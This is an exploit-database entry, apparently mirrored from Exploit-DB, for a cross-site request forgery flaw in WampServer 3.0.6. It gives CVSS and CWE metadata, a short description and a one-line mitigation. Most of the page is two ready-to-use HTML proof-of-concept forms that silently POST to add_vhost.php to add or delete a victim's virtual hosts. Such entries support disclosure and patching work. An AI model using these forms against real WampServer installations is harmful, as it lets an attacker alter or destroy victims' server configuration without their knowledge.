header-logo
Suggest Exploit
vendor:
WampServer
by:
L0RD
8.8
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: WampServer
Affected Version From: 3.0.6
Affected Version To: 3.0.6
Patch Exists: NO
Related CWE: N/A
CPE: a:wampserver:wampserver:3.0.6
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Win 10
2018

WampServer 3.0.6 – Cross-Site Request Forgery

An issue was discovered in WampServer 3.0.6 which allows a remote attacker to force any victim to add or delete virtual hosts. Add virtual hosts exploit: An HTML form is used to send a POST request to the vulnerable add_vhost.php page with the parameters vh_name, vh_ip, and vh_folder. Delete virtual hosts exploit: An HTML form is used to send a POST request to the vulnerable add_vhost.php page with the parameter virtual_del[] set to the name of the virtual host to be deleted.

Mitigation:

Ensure that all user input is validated and sanitized before being used in any web application.
Source

Exploit-DB raw data:

# Exploit Title: WampServer 3.0.6 - Cross-Site Request Forgery
# Date: 2018-06-11
# Exploit Author: L0RD
# Software Link: https://ufile.io/gpqh9
# Vendor Homepage: http://www.wampserver.com/en/
# Version: 3.0.6 - 64bit
# Tested on: Win 10

# Description :
# An issue was discovered in WampServer 3.0.6 which allows a remote
# attacker to force any victim to add or delete virtual hosts.

# POC 1 :
# Add virtual hosts exploit :

<html>
 <head>
   <title>Exploit</title>
 </head>
<body>
  <form action="http://localhost/add_vhost.php?lang=english" method="post">
    <input type="hidden" name="vh_name" value="lord" />
    <input type="hidden" name="vh_ip" value="" />
    <input type="hidden" name="vh_folder" value="C:\wamp64\www"/>
    <input type="submit" name="submit" value="test">
  </form>
 </body>
</html>

# POC 2 :
# Delete virtual hosts exploit :
# Use this exploit to delete specific vhost :
# Exploit :

<form method='post' action="http://localhost/add_vhost.php?lang=english">
    <input type='hidden' name='virtual_del[]' value='Set your vhost name here' checked="true" />
    <input type="submit" name="vhostdelete" value="test">
</form>

Navigation

Suggest Exploit

Services By CQR